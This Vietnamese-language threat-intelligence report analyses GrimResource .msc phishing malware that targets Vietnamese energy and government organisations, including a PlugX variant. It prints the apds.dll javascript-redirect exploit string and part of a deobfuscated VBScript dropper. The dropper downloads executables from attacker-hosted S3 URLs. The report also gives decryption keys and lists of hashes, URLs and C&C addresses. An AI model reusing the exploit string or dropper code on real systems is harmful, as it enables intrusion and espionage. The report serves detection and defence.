GrimResource In The Wild – Mã độc nhắm mục tiêu Việt Nam

Tổng quan

Đội ngũ Threat Intelligence của NCS đã thu thập và phân tích được các mẫu mã độc sử dụng kĩ thuật tấn công GrimResource trong các cuộc tấn công nhắm mục tiêu đến các đơn vị tổ chức tại Việt Nam diễn ra từ khoảng cuối tháng 07/2024 cho đến đầu tháng 09/2024. Mẫu mã độc đầu tiên ghi nhận được thiết kế nhắm mục tiêu đến 1 đơn vị ngành năng lượng tại Việt Nam. Quá trình phân tích cũng như thu thập thông tin từ các nguồn Threat Intelligence khác cho thấy đây là 1 chiến dịch tấn công nhắm đến các tổ chức, đơn vị thuộc ngành năng lượng, quân sự, chính phủ tại các quốc gia Đông và Đông Nam Á bao gồm: Việt Nam, Đài Loan và Hàn Quốc. Mẫu mã độc thứ hai sử dụng file .msc nhằm triển khai mã độc PlugX nhắm tới các đơn vị Chính phủ tại Việt Nam.

Sample 1

Email Phishing

Threat actor khởi tạo tấn công thông qua việc gửi email phishing tới người dùng đính kèm tệp tin được nén trong file .zip.

Kiểm tra email được gửi đến ghi nhận các thông tin:

    • Tên email: Về chỉ đạo và yêu cầu kiểm tra giám sát tình hình hoạt động của các đơn vị thuộc [REDACTED] trong năm 2024
    • Người gửi: Nguyen Thanh Van <thanhnvs@outlook.com>
    • Tệp tin đính kèm: Hướng dẫn và yêu cầu kiểm tra, giám sát hoạt động của từng đơn vị năm 2024.zip

Giải nén tệp tin đính kèm thu được tệp tin định dạng .msc với biểu tượng giả mạo file PDF.

Khi người dùng thực hiện mở tệp tin định dạng .msc, các đoạn mã độc hại sẽ được khởi chạy thông qua kĩ thuật tấn công GrimResource, tệp tin decoy v.pdf cũng sẽ được tải xuống từ máy chủ C&C và được mở nhằm lừa nạn nhân, đồng thời thực thi shellcode độc hại trong bộ nhớ của người dùng bị ảnh hưởng.

Kĩ thuật tấn công GrimResource lợi dụng file .msc

Kĩ thuật tấn công GrimResource đã được phân tích chi tiết bởi ElasticOutFlank. Đội ngũ NCS cũng tổng hợp lại các chi tiết đáng lưu ý trong file .msc thực tế thu được:

– Sử dụng biểu tượng giả mạo: do các file .msc có thể tùy chỉnh biểu tượng hiển thị của file, đối tượng tấn công đã sử dụng biểu tượng giả mạo file PDF để qua mặt người dùng.

– Khai thác lỗ hổng trong aspd.dll để load Javascript URI

<String ID=”39″ Refs=”1″>res://apds.dll/redirect.html?target=javascript:eval(external[“Document”][“ScopeNamespace”][“GetRoot”]()[“Name”]);</String>

Tuy nhiên, đội ngũ Outflank cũng đã chỉ ra rằng đây không phải là phương thức duy nhất có thể sử dụng để triển khai payload

– Sử dụng MSXML method (XSL transformation) và DotNetToScript để thực thi VBScript payload.

Đoạn mã JScript trong file .msc đã được obfuscated, sau quá trình deobfuscate thu được đoạn mã VBScript như hình ảnh dưới đây:

VBScript Payload

Option Explicit
Dim objShell, objFSO, objHTTP
Dim strURL1, strURL2, strURL3, strShowfileURL
Dim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath
Dim strExecutablePath
strURL1 = “https://footracker-statics.s3.sa-east-1.amazonaws.com/musicv.exe”
strURL2 = “https://footracker-statics.s3.sa-east-1.amazonaws.com/musicv.exe.config”
strURL3 = “https://footracker-statics.s3.sa-east-1.amazonaws.com/new.txt”
strShowfileURL = “https://footracker-statics.s3.sa-east-1.amazonaws.com/v.pdf”
strDownloadPath1 = “C:\\Users\\Public\\Music\\musicv.exe”
strDownloadPath2 = “C:\\Users\\Public\\Music\\musicv.exe.config”
strDownloadPath3 = “C:\\Users\\Public\\Music\\music.txt”
strShowfilePath = “C:\\Users\\Public\\[redacted].pdf”
strExecutablePath = “C:\\Users\\Public\\Music\\musicv.exe”
Set objShell = CreateObject(“WScript.Shell”)
Set objFSO = CreateObject(“Scripting.FileSystemObject”)
Set objHTTP = CreateObject(“MSXML2.XMLHTTP”)

……………………………………………………………………..

End Sub

Các tệp tin độc hại được tải xuống từ địa chỉ C&C footracker-statics.s3[.]sa-east-1[.]amazonaws[.]com và lưu tại đường dẫn C:\User\Public\Music và C:\User\Public trên máy nạn nhân, các tệp tin bao gồm:

“C:\\Users\\Public\\Music\\musicv.exe”

“C:\\Users\\Public\\Music\\musicv.exe.config”

“C:\\Users\\Public\\Music\\music.txt”

“C:\\Users\\Public\\[redacted].pdf”

“C:\\Users\\Public\\Music\\musicv.exe”

Nội dung trong musicv.exe.config chứa cấu hình địa chỉ URL để tải xuống mã độc ở giai đoạn tiếp theo

Thực hiện tải xuống thu được payload mới là một DLL .NET có tên gốc là dfsvc.dll. Nhiệm vụ của DLL thực hiện:

    • Giải mã dữ liệu được config trong binary theo cách thức AES(base64[encrypt_data]). AES sử dụng mode CBC với giá trị khóa sẽ được tính toán theo SHA256 của chuỗi “mluqmlfbdzffdpzrcgbppumxhudubuop”, và vector khởi tạo IV có giá trị “gooyvsgnyvyqljvp”. Dữ liệu sau khi giải mã thu được địa chỉ URL chứa shellcode.

    • Sau khi giải mã, URL này lưu trữ shellcode và sẽ được tải về và lưu trong một mảng byte.
    • Cấp phát vùng nhớ, load mảng byte chứa shellcode vào vùng nhớ đã được cấp phát và thực thi thông qua CreateThread

    • Shellcode có thực hiện giao tiếp và gửi thông tin cơ bản của máy nạn nhân tới địa chỉ C&C api[.]s2cloud-amazon[.]com, thông tin về địa chỉ C&C, cùng các cấu hình khác được hardcoded sẵn trong binary. Mã độc cũng triển khai các hàm nhằm deploy thêm mã độc mới trên máy nạn nhân, tuy nhiên tại thời điểm phân tích không thể tải xuống các mã độc ở các stage sau này.

Threat Intelligence Attribution

Đội ngũ Threat Intelligence NCS cũng ghi nhận các cuộc tấn công khác sử dụng kĩ thuật tương tự bao gồm:

– Mẫu mã độc nhắm đến 1 tổ chức chính phủ Đài Loan (水域污染詳細訊息.msc) về vấn đề xử lý ô nhiễm nguồn nước, cũng đã được nhắc đến trong bài phân tích của đội ngũ NTTSH: https://www.virustotal.com/gui/file/661c305355b6812663b0ac657f302c126e0f710d8b2b2edf91be7fca0d6a9268

– Đội ngũ AhnLab Security Intelligence Center (ASEC) cũng công bố bài phân tích về các file mã độc .msc trong đó có 1 file có tên Japan’s Defense Improvement and Attempt for Defense Industry (for review).msc

Thời gian ghi nhận của các mẫu mã độc là từ nửa cuối tháng 07/2024 cho đến cuối tháng 08/2024. Bên cạnh việc sử dụng kĩ thuật GrimResource, các mẫu mã độc còn đều được phát tán thông qua hình thức email phishing, cùng sử dụng Amazon Service để host các máy chủ C&C.

Sample 2

Đầu tháng 09/2024, đội ngũ Threat Intelligence NCS ghi nhận thêm các tệp tin .msc độc hại giả mạo tài liệu sử dụng định dạng PDF và Words có tên file là Pg 151 vv nghi le Quoc khanh 2.9.msc.1 BCTT 02.9 AM Final.docx.msc. Tuy cùng sử dụng kĩ thuật GrimResource nhưng cách thức triển khai mã độc trong VBScript payload khác với Sample 1 khi threat actor sử dụng WindowsInstaller.Installer, tải xuống mã độc ở phase tiếp theo thông qua method InstallProduct và đặt giá trị UILevel2 (Silent Installation).

    • Ở mẫu Pg 151 vv nghi le Quoc khanh 2.9.msc.1, tệp tin được nhúng một đoạn script cho phép tải xuống từ đường dẫn “https[:]//kxmmcdmnb[.]online/eciwrnjnx”. Phân tích tệp tin eciwrnjnx, đây là một tệp tin định dạng .msi bên trong có 3 files bao gồm DLL độc hại HbAvZLnYsGi (hid.dll), tệp tin thực thi hợp pháp JwUBMBlaeu (LDeviceDetectionHelper.exe) và tệp tin chứa payload wQgSTiQiwH (LDevice.dat), đội ngũ NCS nhận thấy có sự tương đồng với các mẫu đã phát hiện trước đó liên quan đến việc triển khai mã độc plugX nhắm tới đơn vị Chính phủ dựa theo tài liệu decoy có trong cấu hình của mã độc.

    • Ở mẫu BCTT 02.9 AM Final.docx.msc, tệp tin cũng nhúng một đoạn script cho phép tải xuống từ đường dẫn “https://lokjopppkuimlpo.shop/vxedw”. Tại thời điểm kiểm tra, nhóm phân tích không thể tải xuống tệp tin vxedw này.

Indicators of Compromise (IoCs)

Sample 1

 

Hướng dẫn và yêu cầu kiểm tra, giám sát hoạt động của từng đơn vị năm 2024.zip

4400CAC2611C1D41E6307811CDECA8AAD07989CD

Hướng dẫn và yêu cầu kiểm tra, giám sát hoạt động của từng đơn vị năm 2024.msc.

D9B814F53E82F686D84647B7D390804B331F1583

musicv.exe.config

15DE66A26AC4515CD43BEB0D8501D8592C021643

af7ffc2a629a1cvn8336fde8a1f71e0a.json (dfsvc.dll)

EE8E613AA7EB0CFFFCFD633E992333226AFEB4F5

musicv.exe (dfsvc.exe)

D25C62A57AC3000244741BDA129F483F2347EFA6

new.txt

356A192B7913B04C54574D18C28D46E6395428AB

v.pdf

D4F4FCB9789824BCA66B15206CAEC7A4

2472dca8c48ab987e632e66caabf86502bf3.xml

0C93507DB212C506FA82FFAADFF7E034

Đường dẫn lưu tệp tin độc hại:

“C:\\Users\\Public\\Music\\musicv.exe”

“C:\\Users\\Public\\Music\\musicv.exe.config”

“C:\\Users\\Public\\Music\\music.txt”

“C:\\Users\\Public\\Music\\musicv.exe”

URL:

https[:]//footracker-statics.s3[.]sa-east-1[.]amazonaws[.]com/musicv.exe

https[:]//footracker-statics.s3[.]sa-east-1[.]amazonaws.com/musicv.exe.config

https[:]//footracker-statics.s3[.]sa-east-1[.]amazonaws[.]com/new.txt

https[:]//footracker-statics[.]s3[.]sa-east-1.amazonaws.com/v.pdf

https[:]//p-game[.]s3.sa-east-1.amazonaws[.]com/af7ffc2a629a1cvn8336fde8a1f71e0a.json
https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/af7ffc2a629a1c258336fde8a1f71e0a.json

https[:]//speedshare.oss-cn-hongkong[.]aliyuncs.com/2472dca8c48ab987e632e66caabf86502bf3.xml

UA:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36

Domain lưu trữ file

p-game[.]s3.sa-east-1.amazonaws[.]com

footracker-statics.s3[.]sa-east-1[.]amazonaws.com

speedshare[.]oss-cn-hongkong[.]aliyuncs.com

Domain C&C

api[.]s2cloud-amazon[.]com

Sample 2

BCTT 02.9 AM Final.docx.rar

55da0aef5972a3c6953215b7be68bb74c21e2fdb

BCTT 02.9 AM Final.docx.msc

a3cc29e7590c761b1b4674a50032c191ecfa1143

Pg 151 vv nghi le Quoc khanh 2.9.msc.1

b9b552ef5e41d61890e8821639d360af72bcb8d1

eciwrnjnx

9e65911f17ed379425b35be056b358f1b9ec9a9b

URL

https[:]//kxmmcdmnb[.]online/eciwrnjnx

https[:]//lokjopppkuimlpo[.]shop/vxedw

IP C&C

            45.133[.]239.21